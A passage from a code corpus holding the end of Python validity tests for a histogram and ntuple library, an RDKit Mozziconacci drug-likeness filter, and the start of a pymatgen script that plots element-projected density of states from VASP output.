numpy.array([0.0, 0.0, 0.0]), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0, 0.0, 0.0]
h = BinnedEvaluatedFunction(
[
Axis(
CategoryBinning(
["one", "two", "three"], loc_overflow=CategoryBinning.above1
)
)
],
InterpretedInlineBuffer(
numpy.array([0.0, 0.0, 0.0, 0.0]), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0, 0.0, 0.0, 0.0]
def test_validity_SparseRegularBinning(self):
h = BinnedEvaluatedFunction(
[Axis(SparseRegularBinning([-5, -3, 10, 1000], 0.1))],
InterpretedInlineBuffer(
numpy.array([0.0, 0.0, 0.0, 0.0]), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0, 0.0, 0.0, 0.0]
def test_validity_FractionBinning(self):
h = BinnedEvaluatedFunction(
[Axis(FractionBinning())],
InterpretedInlineBuffer(
numpy.array([0.0, 0.0]), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0, 0.0]
assert h.axis[0].binning.error_method == FractionBinning.unspecified
h = BinnedEvaluatedFunction(
[Axis(FractionBinning()), Axis(RegularBinning(10, RealInterval(-5, 5)))],
InterpretedInlineBuffer(
numpy.array(
[
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
]
),
dtype=InterpretedInlineBuffer.float64,
),
)
h.checkvalid()
assert h.values.array.tolist() == [
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
]
h = BinnedEvaluatedFunction(
[Axis(RegularBinning(10, RealInterval(-5, 5))), Axis(FractionBinning())],
InterpretedInlineBuffer(
numpy.array(
[
[
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
]
]
),
dtype=InterpretedInlineBuffer.float64,
),
)
h.checkvalid()
assert h.values.array.tolist() == [
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
]
def test_validity_PredicateBinning(self):
h = Histogram(
[Axis(PredicateBinning(["p", "q"]))],
UnweightedCounts(
InterpretedInlineBuffer.fromarray(numpy.array([0.0, 0.0]))
),
)
h.checkvalid()
def test_validity_Assignments(self):
h = Histogram(
[
Axis(
VariationBinning(
[
Variation(
[
Assignment("x", "1"),
Assignment("y", "2"),
Assignment("z", "3"),
]
)
]
)
)
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.array([0.0]))),
)
h.checkvalid()
assert h.axis[0].binning.variations[0].assignments[1].expression == "2"
def test_validity_Variation(self):
h = Histogram(
[
Axis(
VariationBinning(
[
Variation([Assignment("x", "1")]),
Variation([Assignment("x", "2")]),
]
)
)
],
UnweightedCounts(
InterpretedInlineBuffer.fromarray(numpy.array([0.0, 0.0]))
),
)
h.checkvalid()
def test_validity_VariationBinning(self):
h = Histogram(
[
Axis(
VariationBinning(
[
Variation([Assignment("x", "1")]),
Variation([Assignment("x", "2")]),
Variation([Assignment("x", "3")]),
]
)
)
],
UnweightedCounts(
InterpretedInlineBuffer.fromarray(numpy.array([0.0, 0.0, 0.0]))
),
)
h.checkvalid()
def test_validity_Axis(self):
h = BinnedEvaluatedFunction(
[Axis(expression="x", title="wow")],
InterpretedInlineBuffer(
numpy.array([0.0]), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.axis[0].expression == "x"
assert h.values.array.tolist() == [0.0]
def test_validity_UnweightedCounts(self):
h = Histogram(
[Axis(RegularBinning(10, RealInterval(-5, 5)))],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(10))),
)
h.checkvalid()
def test_validity_WeightedCounts(self):
h = Histogram(
[Axis(RegularBinning(10, RealInterval(-5, 5)))],
WeightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(10))),
)
h.checkvalid()
h = Histogram(
[Axis(RegularBinning(10, RealInterval(-5, 5)))],
WeightedCounts(
InterpretedInlineBuffer.fromarray(numpy.arange(10)),
sumw2=InterpretedInlineBuffer.fromarray(numpy.arange(10) ** 2),
),
)
h.checkvalid()
h = Histogram(
[Axis(RegularBinning(10, RealInterval(-5, 5)))],
WeightedCounts(
InterpretedInlineBuffer.fromarray(numpy.arange(10)),
sumw2=InterpretedInlineBuffer.fromarray(numpy.arange(10) ** 2),
unweighted=UnweightedCounts(
InterpretedInlineBuffer.fromarray(numpy.arange(10))
),
),
)
h.checkvalid()
def test_validity_StatisticFilter(self):
h = Histogram(
[
Axis(
RegularBinning(10, RealInterval(-5, 5)),
statistics=[
Statistics(
moments=[
Moments(
InterpretedInlineBuffer.fromarray(
numpy.array([0.0])
),
1,
filter=StatisticFilter(excludes_nan=False),
)
]
)
],
)
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(10))),
)
h.checkvalid()
def test_validity_Moments(self):
h = Histogram(
[
Axis(
RegularBinning(10, RealInterval(-5, 5)),
statistics=[
Statistics(
moments=[
Moments(
InterpretedInlineBuffer.fromarray(
numpy.array([0.0])
),
1,
),
Moments(
InterpretedInlineBuffer.fromarray(
numpy.array([0.0])
),
2,
),
]
)
],
)
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(10))),
)
h.checkvalid()
h = Histogram(
[
Axis(
RegularBinning(10, RealInterval(-5, 5)),
statistics=[
Statistics(
moments=[
Moments(
InterpretedInlineBuffer.fromarray(
numpy.array([0.0])
),
0,
weightpower=0,
),
Moments(
InterpretedInlineBuffer.fromarray(
numpy.array([0.0])
),
0,
weightpower=1,
),
]
)
],
)
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(10))),
)
h.checkvalid()
def test_validity_Extremes(self):
h = Histogram(
[
Axis(
RegularBinning(10, RealInterval(-5, 5)),
statistics=[
Statistics(
min=Extremes(
InterpretedInlineBuffer.fromarray(numpy.array([0.0]))
)
)
],
)
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(10))),
)
h.checkvalid()
h = Histogram(
[
Axis(
RegularBinning(10, RealInterval(-5, 5)),
statistics=[
Statistics(
min=Extremes(
InterpretedInlineBuffer.fromarray(numpy.array([0.0]))
),
max=Extremes(
InterpretedInlineBuffer.fromarray(numpy.array([0.0]))
),
)
],
)
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(10))),
)
h.checkvalid()
def test_validity_Quantiles(self):
h = Histogram(
[
Axis(
RegularBinning(10, RealInterval(-5, 5)),
statistics=[
Statistics(
quantiles=[
Quantiles(
InterpretedInlineBuffer.fromarray(
numpy.array([0.0])
),
0.25,
),
Quantiles(
InterpretedInlineBuffer.fromarray(
numpy.array([0.0])
)
),
Quantiles(
InterpretedInlineBuffer.fromarray(
numpy.array([0.0])
),
0.75,
),
]
)
],
)
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(10))),
)
h.checkvalid()
h = Histogram(
[
Axis(
RegularBinning(10, RealInterval(-5, 5)),
statistics=[
Statistics(
quantiles=[
Quantiles(
InterpretedInlineBuffer.fromarray(
numpy.array([0.0])
),
weightpower=0,
),
Quantiles(
InterpretedInlineBuffer.fromarray(
numpy.array([0.0])
),
weightpower=1,
),
]
)
],
)
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(10))),
)
h.checkvalid()
def test_validity_Modes(self):
h = Histogram(
[
Axis(
RegularBinning(10, RealInterval(-5, 5)),
statistics=[
Statistics(
mode=Modes(
InterpretedInlineBuffer.fromarray(numpy.array([0.0]))
)
)
],
)
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(10))),
)
h.checkvalid()
def test_validity_Statistics(self):
h = Histogram(
[
Axis(
RegularBinning(10, RealInterval(-5, 5)), statistics=[Statistics()]
),
Axis(
RegularBinning(10, RealInterval(-5, 5)), statistics=[Statistics()]
),
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(100))),
)
h.checkvalid()
h = Ntuple(
[Column("one", Column.int32), Column("two", Column.int16)],
[
NtupleInstance(
[
Chunk(
[
ColumnChunk(
[Page(RawInlineBuffer(b"\x05\x00\x00\x00"))], [0, 1]
),
ColumnChunk(
[Page(RawInlineBuffer(b"\x03\x00"))], [0, 1]
),
]
)
]
)
],
column_statistics=[
Statistics(
moments=[
Moments(
InterpretedInlineBuffer.fromarray(numpy.array([0.0])), 1
),
Moments(
InterpretedInlineBuffer.fromarray(numpy.array([0.0])), 2
),
]
)
],
)
h.checkvalid()
def test_validity_Covariance(self):
h = Histogram(
[
Axis(RegularBinning(10, RealInterval(-5, 5))),
Axis(RegularBinning(10, RealInterval(-5, 5))),
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(100))),
axis_covariances=[
Covariance(0, 1, InterpretedInlineBuffer.fromarray(numpy.arange(1)))
],
)
h.checkvalid()
h = Histogram(
[
Axis(RegularBinning(10, RealInterval(-5, 5))),
Axis(RegularBinning(10, RealInterval(-5, 5))),
Axis(RegularBinning(10, RealInterval(-5, 5))),
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(1000))),
axis_covariances=[
Covariance(0, 1, InterpretedInlineBuffer.fromarray(numpy.arange(1))),
Covariance(0, 2, InterpretedInlineBuffer.fromarray(numpy.arange(1))),
Covariance(1, 2, InterpretedInlineBuffer.fromarray(numpy.arange(1))),
],
)
h.checkvalid()
h = Histogram(
[Axis(RegularBinning(10, RealInterval(-5, 5)))],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(10))),
[
Profile(
"",
Statistics(
[
Moments(
InterpretedInlineBuffer.fromarray(numpy.zeros(10)), 1
),
Moments(
InterpretedInlineBuffer.fromarray(numpy.zeros(10)), 2
),
]
),
),
Profile(
"",
Statistics(
[
Moments(
InterpretedInlineBuffer.fromarray(numpy.zeros(10)), 1
),
Moments(
InterpretedInlineBuffer.fromarray(numpy.zeros(10)), 2
),
]
),
),
],
profile_covariances=[
Covariance(0, 1, InterpretedInlineBuffer.fromarray(numpy.arange(1)))
],
)
h.checkvalid()
h = Ntuple(
[Column("one", Column.int32), Column("two", Column.int16)],
[
NtupleInstance(
[
Chunk(
[
ColumnChunk(
[Page(RawInlineBuffer(b"\x05\x00\x00\x00"))], [0, 1]
),
ColumnChunk(
[Page(RawInlineBuffer(b"\x03\x00"))], [0, 1]
),
]
)
]
)
],
column_covariances=[
Covariance(0, 1, InterpretedInlineBuffer.fromarray(numpy.arange(1)))
],
)
h.checkvalid()
h = Ntuple(
[Column("one", Column.int32), Column("two", Column.int16)],
[
NtupleInstance(
[
Chunk(
[
ColumnChunk(
[Page(RawInlineBuffer(b"\x05\x00\x00\x00"))], [0, 1]
),
ColumnChunk(
[Page(RawInlineBuffer(b"\x03\x00"))], [0, 1]
),
]
)
]
)
],
column_covariances=[
Covariance(
0,
1,
InterpretedInlineBuffer.fromarray(numpy.arange(1)),
weightpower=1,
),
Covariance(
0,
1,
InterpretedInlineBuffer.fromarray(numpy.arange(1)),
weightpower=0,
),
],
)
h.checkvalid()
def test_validity_Profile(self):
h = Histogram(
[Axis(RegularBinning(10, RealInterval(-5, 5)))],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(10))),
[
Profile(
"",
Statistics(
[
Moments(
InterpretedInlineBuffer.fromarray(numpy.zeros(10)), 1
),
Moments(
InterpretedInlineBuffer.fromarray(numpy.zeros(10)), 2
),
]
),
)
],
)
h.checkvalid()
h = Histogram(
[
Axis(RegularBinning(10, RealInterval(-5, 5))),
Axis(RegularBinning(10, RealInterval(-5, 5))),
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(100))),
[
Profile(
"",
Statistics(
[
Moments(
InterpretedInlineBuffer.fromarray(numpy.zeros(100)), 1
),
Moments(
InterpretedInlineBuffer.fromarray(numpy.zeros(100)), 2
),
]
),
)
],
)
h.checkvalid()
def test_validity_Histogram(self):
h = Histogram(
[
Axis(RegularBinning(10, RealInterval(-5, 5))),
Axis(RegularBinning(10, RealInterval(-5, 5))),
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(100))),
)
h.checkvalid()
def test_validity_Parameter(self):
h = ParameterizedFunction(
"x**2",
[
Parameter("x", InterpretedInlineBuffer.fromarray(numpy.array([5]))),
Parameter("y", InterpretedInlineBuffer.fromarray(numpy.array([6]))),
],
)
h.checkvalid()
assert h.parameters[1].values.array.tolist() == [6]
def test_validity_ParameterizedFunction(self):
h = ParameterizedFunction("x**2")
h.checkvalid()
h = Histogram(
[
Axis(RegularBinning(10, RealInterval(-5, 5))),
Axis(RegularBinning(10, RealInterval(-5, 5))),
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(100))),
functions={
"f": ParameterizedFunction(
"x**2",
[
Parameter(
"x", InterpretedInlineBuffer.fromarray(numpy.arange(100))
)
],
)
},
)
h.checkvalid()
def test_validity_EvaluatedFunction(self):
h = Histogram(
[
Axis(RegularBinning(10, RealInterval(-5, 5))),
Axis(RegularBinning(10, RealInterval(-5, 5))),
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(100))),
functions={
"f": EvaluatedFunction(
InterpretedInlineBuffer.fromarray(numpy.arange(100))
)
},
)
h.checkvalid()
assert (
h.functions["f"].values.array.tolist()
== numpy.arange(100).reshape((10, 10)).tolist()
)
h = Histogram(
[
Axis(RegularBinning(10, RealInterval(-5, 5))),
Axis(RegularBinning(10, RealInterval(-5, 5))),
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(100))),
functions={
"f": EvaluatedFunction(
InterpretedInlineBuffer.fromarray(numpy.arange(100)),
InterpretedInlineBuffer.fromarray(numpy.arange(100)),
)
},
)
h.checkvalid()
h = Histogram(
[
Axis(RegularBinning(10, RealInterval(-5, 5))),
Axis(RegularBinning(10, RealInterval(-5, 5))),
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(100))),
functions={
"f": EvaluatedFunction(
InterpretedInlineBuffer.fromarray(numpy.arange(100)),
InterpretedInlineBuffer.fromarray(numpy.arange(100)),
[
Quantiles(
InterpretedInlineBuffer.fromarray(numpy.zeros(100)), 0.25
),
Quantiles(InterpretedInlineBuffer.fromarray(numpy.zeros(100))),
Quantiles(
InterpretedInlineBuffer.fromarray(numpy.zeros(100)), 0.75
),
],
)
},
)
h.checkvalid()
def test_validity_BinnedEvaluatedFunction(self):
h = BinnedEvaluatedFunction(
[Axis()],
InterpretedInlineBuffer(
numpy.array([0.0]), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0]
h = BinnedEvaluatedFunction(
[Axis(), Axis()],
InterpretedInlineBuffer(
numpy.array([[0.0]]), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [[0.0]]
def test_validity_Page(self):
h = Ntuple(
[Column("one", Column.int32)],
[
NtupleInstance(
[
Chunk(
[
ColumnChunk(
[Page(RawInlineBuffer(b"\x05\x00\x00\x00"))], [0, 1]
)
]
)
]
)
],
)
h.checkvalid()
assert h.instances[0].chunks[0].column_chunks[0].pages[0].array.tolist() == [5]
h = Ntuple(
[Column("one", Column.int32)],
[NtupleInstance([Chunk([ColumnChunk([], [0])])])],
)
h.checkvalid()
assert h.instances[0].chunks[0].column_chunks[0].array.tolist() == []
assert {n: x.tolist() for n, x in h.instances[0].chunks[0].arrays.items()} == {
"one": []
}
for arrays in h.instances[0].arrays:
pass
assert {n: x.tolist() for n, x in arrays.items()} == {"one": []}
h = Ntuple(
[Column("one", Column.int32)],
[
NtupleInstance(
[
Chunk(
[
ColumnChunk(
[Page(RawInlineBuffer(b"\x05\x00\x00\x00"))], [0, 1]
)
]
)
]
)
],
)
h.checkvalid()
assert h.instances[0].chunks[0].column_chunks[0].array.tolist() == [5]
assert {n: x.tolist() for n, x in h.instances[0].chunks[0].arrays.items()} == {
"one": [5]
}
for arrays in h.instances[0].arrays:
pass
assert {n: x.tolist() for n, x in arrays.items()} == {"one": [5]}
h = Ntuple(
[Column("one", Column.int32)],
[
NtupleInstance(
[
Chunk(
[
ColumnChunk(
[
Page(RawInlineBuffer(b"\x05\x00\x00\x00")),
Page(
RawInlineBuffer(
b"\x04\x00\x00\x00\x03\x00\x00\x00"
)
),
],
[0, 1, 3],
)
]
)
]
)
],
)
h.checkvalid()
assert h.instances[0].chunks[0].column_chunks[0].array.tolist() == [5, 4, 3]
assert {n: x.tolist() for n, x in h.instances[0].chunks[0].arrays.items()} == {
"one": [5, 4, 3]
}
for arrays in h.instances[0].arrays:
pass
assert {n: x.tolist() for n, x in arrays.items()} == {"one": [5, 4, 3]}
def test_validity_Chunk(self):
h = Ntuple(
[Column("one", Column.float64)],
[NtupleInstance([Chunk([ColumnChunk([], [0])])])],
)
h.checkvalid()
h = Ntuple([Column("one", Column.int32)], [NtupleInstance([])])
h.checkvalid()
for arrays in h.instances[0].arrays:
assert False
h = Ntuple(
[Column("one", Column.int32)],
[
NtupleInstance(
[
Chunk(
[
ColumnChunk(
[Page(RawInlineBuffer(b"\x05\x00\x00\x00"))], [0, 1]
)
]
)
]
)
],
)
h.checkvalid()
for arrays in h.instances[0].arrays:
pass
assert {n: x.tolist() for n, x in arrays.items()} == {"one": [5]}
h = Ntuple(
[Column("one", Column.int32)],
[
NtupleInstance(
[
Chunk(
[
ColumnChunk(
[Page(RawInlineBuffer(b"\x05\x00\x00\x00"))], [0, 1]
)
]
),
Chunk(
[
ColumnChunk(
[Page(RawInlineBuffer(b"\x05\x00\x00\x00"))], [0, 1]
)
]
),
]
)
],
)
h.checkvalid()
for arrays in h.instances[0].arrays:
assert {n: x.tolist() for n, x in arrays.items()} == {"one": [5]}
def test_validity_Column(self):
h = Ntuple(
[Column("one", Column.float64), Column("two", Column.int32)],
[NtupleInstance([])],
)
h.checkvalid()
h = Ntuple(
[Column("one", Column.int32), Column("two", Column.int16)],
[
NtupleInstance(
[
Chunk(
[
ColumnChunk(
[Page(RawInlineBuffer(b"\x05\x00\x00\x00"))], [0, 1]
),
ColumnChunk(
[Page(RawInlineBuffer(b"\x03\x00"))], [0, 1]
),
]
)
]
)
],
)
h.checkvalid()
for arrays in h.instances[0].arrays:
pass
assert {n: x.tolist() for n, x in arrays.items()} == {"one": [5], "two": [3]}
def test_validity_Ntuple(self):
h = Ntuple([Column("one", Column.float64)], [NtupleInstance([])])
h.checkvalid()
def test_validity_collection(self):
h = Collection()
h.checkvalid()
h = Collection(
{
"id": Histogram(
[Axis(RegularBinning(10, RealInterval(-5, 5)))],
UnweightedCounts(
InterpretedInlineBuffer.fromarray(numpy.arange(30))
),
),
"id2": Histogram(
[Axis(RegularBinning(100, RealInterval(-5, 5)))],
UnweightedCounts(
InterpretedInlineBuffer.fromarray(numpy.arange(300))
),
),
},
axis=[Axis(RegularBinning(3, RealInterval(-1, 1)))],
)
h.checkvalid()
h = Collection(
{
"b": Collection(
{
"c": Histogram(
[Axis(RegularBinning(10, RealInterval(-5, 5)))],
UnweightedCounts(
InterpretedInlineBuffer.fromarray(numpy.arange(60))
),
),
"d": Histogram(
[Axis(RegularBinning(100, RealInterval(-5, 5)))],
UnweightedCounts(
InterpretedInlineBuffer.fromarray(numpy.arange(600))
),
),
},
axis=[Axis(FractionBinning())],
)
},
axis=[Axis(RegularBinning(3, RealInterval(-1, 1)))],
)
h.checkvalid()
assert (
h.objects["b"].objects["c"].counts.counts.array.tolist()
== numpy.arange(60).reshape((3, 2, 10)).tolist()
)
| 34.796927 | 88 | 0.378683 |
794646029a4c1f751923da3acf7504bee09bafac | 3,268 | py | Python | smilesmerge/operators/filter/filter_classes/filter_children_classes/mozziconacci_filter.py | Jacob-Spiegel/SMILESMerge | 0f98a3a5739cab7e9bbae768d11c65420b5061c1 | [
"Apache-2.0"
] | 1 | 2021-06-29T14:09:43.000Z | 2021-06-29T14:09:43.000Z | smilesmerge/operators/filter/filter_classes/filter_children_classes/mozziconacci_filter.py | Jacob-Spiegel/SMILESMerge | 0f98a3a5739cab7e9bbae768d11c65420b5061c1 | [
"Apache-2.0"
] | null | null | null | smilesmerge/operators/filter/filter_classes/filter_children_classes/mozziconacci_filter.py | Jacob-Spiegel/SMILESMerge | 0f98a3a5739cab7e9bbae768d11c65420b5061c1 | [
"Apache-2.0"
] | 1 | 2021-06-29T14:09:48.000Z | 2021-06-29T14:09:48.000Z | """Mozziconacci Filter
This runs a Mozziconacci filter. Mozziconacci filter is a filter for
Drug-likeliness which filters molecules by the number of: rotatable bonds,
rings, oxygens, and halogens.
To pass the filter a molecule must be:
# of Rotatable bonds: Max 15
# of Rings: Max 6
# of Oxygens: Min 1
# of Nitrogens: Min 1
# of Halogens: Max 7
If you use the Mozziconacci Filter please cite: Mozziconacci, J. C. et al.
Preparation of a Molecular Database from a Set of 2 Million Compounds for
Virtual Screening Applications: Gathering, Structural Analysis and Filtering.
9th Electronic Computational Chemistry Conference, World Wide Web, March
(2003).
"""
import __future__
import rdkit
import rdkit.Chem as Chem
import rdkit.Chem.Lipinski as Lipinski
# Disable the unnecessary RDKit warnings
rdkit.RDLogger.DisableLog("rdApp.*")
from smilesmerge.operators.filter.filter_classes.parent_filter_class import ParentFilter
class MozziconacciFilter(ParentFilter):
"""
This runs a Mozziconacci filter. Mozziconacci filter is a filter for
Drug-likeliness which filters molecules by the number of:
To pass the filter a molecule must be:
# of Rotatable bonds: Max 15
# of Rings: Max 6
# of Oxygens: Min 1
# of Nitrogens: Min 1
# of Halogens: Max 7
If you use the Mozziconacci Filter please cite: Mozziconacci, J. C. et al.
Preparation of a Molecular Database from a Set of 2 Million Compounds for
Virtual Screening Applications: Gathering, Structural Analysis and
Filtering. 9th Electronic Computational Chemistry Conference, World Wide
Web, March (2003).
Inputs:
:param class ParentFilter: a parent class to initialize off
"""
def run_filter(self, mol):
"""
This runs a Mozziconacci filter. Mozziconacci filter is a filter for
Drug-likeliness which filters molecules by the number of:
To pass the filter a molecule must be:
# of Rotatable bonds: Max 15
# of Rings: Max 6
# of Oxygens: Min 1
# of Nitrogens: Min 1
# of Halogens: Max 7
Inputs:
:param rdkit.Chem.rdchem.Mol object mol: An rdkit mol object to be
tested if it passes the filters
Returns:
:returns: bool bool: True if the mol passes the filter; False if it
fails the filter
"""
halogen = Chem.MolFromSmarts("[*;#9,#17,#35,#53,#85]")
number_of_halogens = len(mol.GetSubstructMatches(halogen, maxMatches=8))
if number_of_halogens > 7:
return False
oxygen = Chem.MolFromSmarts("[#8]")
number_of_oxygens = len(mol.GetSubstructMatches(oxygen, maxMatches=2))
if number_of_oxygens < 1:
return False
nitrogen = Chem.MolFromSmarts("[#7]")
number_of_nitrogen = len(mol.GetSubstructMatches(nitrogen, maxMatches=2))
if number_of_nitrogen < 1:
return False
num_rotatable_bonds = Lipinski.NumRotatableBonds(mol)
if num_rotatable_bonds > 15:
return False
ring_count = Chem.rdmolops.GetSSSR(mol)
if ring_count > 6:
return False
# Passes everything
return True
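# Usage sketch (not part of the original file): the SMILES string is an arbitrary
# drug-like example (paracetamol) chosen only to illustrate the call. It assumes
# RDKit and the smilesmerge package are importable and that ParentFilter needs no
# constructor arguments.
if __name__ == "__main__":
    example_mol = Chem.MolFromSmiles("CC(=O)Nc1ccc(O)cc1")  # 1 ring, 2 O, 1 N, few rotatable bonds
    print(MozziconacciFilter().run_filter(example_mol))     # expected: True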
| 32.68 | 88 | 0.672277 |
7946462b40a70c3060b0b5fde40a90580b5c0a98 | 6,408 | py | Python | DOS_process/plot_DOS_by_elements/Plot_PDOS_by_elements.py | bitsoal/auxiliary_scripts_for_vasp | 2c3e34d2cf062fd4cca4c31311db1a7c87e8812c | [
"MIT"
] | null | null | null | DOS_process/plot_DOS_by_elements/Plot_PDOS_by_elements.py | bitsoal/auxiliary_scripts_for_vasp | 2c3e34d2cf062fd4cca4c31311db1a7c87e8812c | [
"MIT"
] | null | null | null | DOS_process/plot_DOS_by_elements/Plot_PDOS_by_elements.py | bitsoal/auxiliary_scripts_for_vasp | 2c3e34d2cf062fd4cca4c31311db1a7c87e8812c | [
"MIT"
] | 2 | 2019-04-24T02:59:35.000Z | 2019-12-14T03:20:07.000Z |
# coding: utf-8
# In[1]:
from pymatgen.io.vasp.outputs import Vasprun
#from pymatgen.electronic_structure.plotter
from pymatgen.io.vasp.outputs import Orbital, Spin
from pymatgen import Structure
import numpy as np
import matplotlib.pyplot as plt
#%matplotlib inline
import os, glob
# In[2]:
def sum_pdos(pdos_obj, atom_ind_list, orbital_list, spin_list):
total_pdos = np.zeros(pdos_obj[0][Orbital.s][Spin.up].shape)
for atom_ind in atom_ind_list:
for orbital in orbital_list:
for spin in spin_list:
total_pdos = total_pdos + pdos_obj[atom_ind][orbital][spin]
return total_pdos
# In[3]:
def get_atom_ind_of_an_ele(ele_list, target_ele):
atom_ind_list = []
for atom_ind, ele in enumerate(ele_list):
if target_ele == ele:
atom_ind_list.append(atom_ind)
return atom_ind_list
# In[27]:
def save_pdos_data(tdos, spin_up_pdos_list, spin_down_pdos_list, projected_ele_list, ISPIN=2, wrt_fermi=True, *args, **argvs):
if wrt_fermi:
energies = tdos.energies - tdos.efermi
else:
energies = tdos.energies
spin_up_tdos = tdos.densities[Spin.up]
no_of_columns = 1 + len(projected_ele_list)
no_of_data_points = len(list(spin_up_tdos))
head_line = "#Energy\tTotal\t" + "\t".join(projected_ele_list) + "\n"
with open("pdos.dat", "w") as pdos_f:
pdos_f.write(head_line)
for data_point_ind in range(no_of_data_points):
line = "%f\t%f\t" % (energies[data_point_ind], spin_up_tdos[data_point_ind])
for spin_up_pdos in spin_up_pdos_list:
line += "%f\t" % spin_up_pdos[data_point_ind]
line += "\n"
pdos_f.write(line)
if ISPIN == 2:
pdos_f.write("\n")
spin_down_tdos = tdos.densities[Spin.down]
for data_point_ind in range(no_of_data_points):
                line = "%f\t%f\t" % (energies[data_point_ind], spin_down_tdos[data_point_ind])  # spin-down block reports the spin-down total DOS
for spin_down_pdos in spin_down_pdos_list:
line += "%f\t" % spin_down_pdos[data_point_ind]
line += "\n"
pdos_f.write(line)
# In[30]:
def plot_pdos_by_ele(tdos, spin_up_pdos_list, spin_down_pdos_list, projected_ele_list, ISPIN=2, plot_tdos=False, wrt_fermi=True, energy_range_wrt_fermi=3, title=None):
if wrt_fermi:
energies = tdos.energies - tdos.efermi
valid_energy_ind = np.logical_and(energy_range_wrt_fermi[0]+0.1 <= energies, energies<=energy_range_wrt_fermi[1]-0.1)
energy_range = energy_range_wrt_fermi
else:
energies = tdos.energies
valid_energy_ind = np.logical_and(energy_range_wrt_fermi[0]+tdos.efermi+0.1 <= energies,
energies<=energy_range_wrt_fermi[1]+tdos.efermi-0.1)
energy_range = [energy_range_wrt_fermi[0] + tdos.efermi, energy_range_wrt_fermi[1] + tdos.efermi]
spin_up_max_y = max([np.max(pdos[valid_energy_ind]) for pdos in spin_up_pdos_list])
spin_down_max_y = 0
if ISPIN == 2:
spin_down_max_y = max([np.max(np.abs(pdos[valid_energy_ind])) for pdos in spin_down_pdos_list])
max_y = max([spin_up_max_y, spin_down_max_y])
spin_up_tdos = tdos.densities[Spin.up]
spin_up_tdos_max = np.max(spin_up_tdos[valid_energy_ind])
spin_down_tdos = np.zeros(spin_up_tdos.shape)
spin_down_tdos_max = 0
if ISPIN==2:
spin_down_tdos = -1*tdos.densities[Spin.down]
spin_down_tdos_max = np.max(np.abs(spin_down_tdos[valid_energy_ind]))
if plot_tdos:
max_y = max([max_y, spin_up_tdos_max, spin_down_tdos_max])
max_y *= 1.1
min_y = -max_y if ISPIN == 2 else 0
color_list = ["blue", "green", "red", "cyan", "magenta", "yellow", "purple", "orange"]
line_width = 0.5
plt.cla()
if plot_tdos:
plt.plot(energies, spin_up_tdos, label='Total', color="black", linewidth=line_width)
plt.plot(energies, spin_down_tdos, color="black", linewidth=line_width)
for ele_ind, ele in enumerate(projected_ele_list):
plt.plot(energies, spin_up_pdos_list[ele_ind], label=ele, color=color_list[ele_ind], linewidth=line_width)
if ISPIN == 2:
plt.plot(energies, spin_down_pdos_list[ele_ind], color=color_list[ele_ind], linewidth=line_width)
if wrt_fermi:
plt.plot([0, 0], [min_y, max_y], "--", color="brown", linewidth=line_width)
plt.xlim(energy_range_wrt_fermi)
else:
plt.plot([tdos.efermi, tdos.efermi], [min_y, max_y], "--", color="brown", linewidth=line_width)
plt.xlim([energy_range_wrt_fermi[0]+tdos.efermi, tdos.efermi+energy_range_wrt_fermi[1]])
plt.ylim([min_y, max_y])
plt.legend()
plt.xlabel("Energy (eV)")
plt.ylabel("Density of States (states/eV)")
if title != None:
plt.title(title)
plt.tick_params(axis='both', which='both', direction='in')
plt.savefig("pdos.png", format='png', dpi=500)
# In[31]:
if __name__ == "__main__":
projected_ele_list = ["Co", "N", "C", "H"]
plot_total = False
vasprun = Vasprun("vasprun.xml")
pdos = vasprun.pdos
tdos = vasprun.tdos
orbital_list = [Orbital.s, Orbital.px, Orbital.py, Orbital.pz, Orbital.dx2, Orbital.dxy, Orbital.dxz, Orbital.dyz, Orbital.dz2]
spin_up_list, spin_down_list = [], []
ISPIN = vasprun.incar["ISPIN"]
for ele in projected_ele_list:
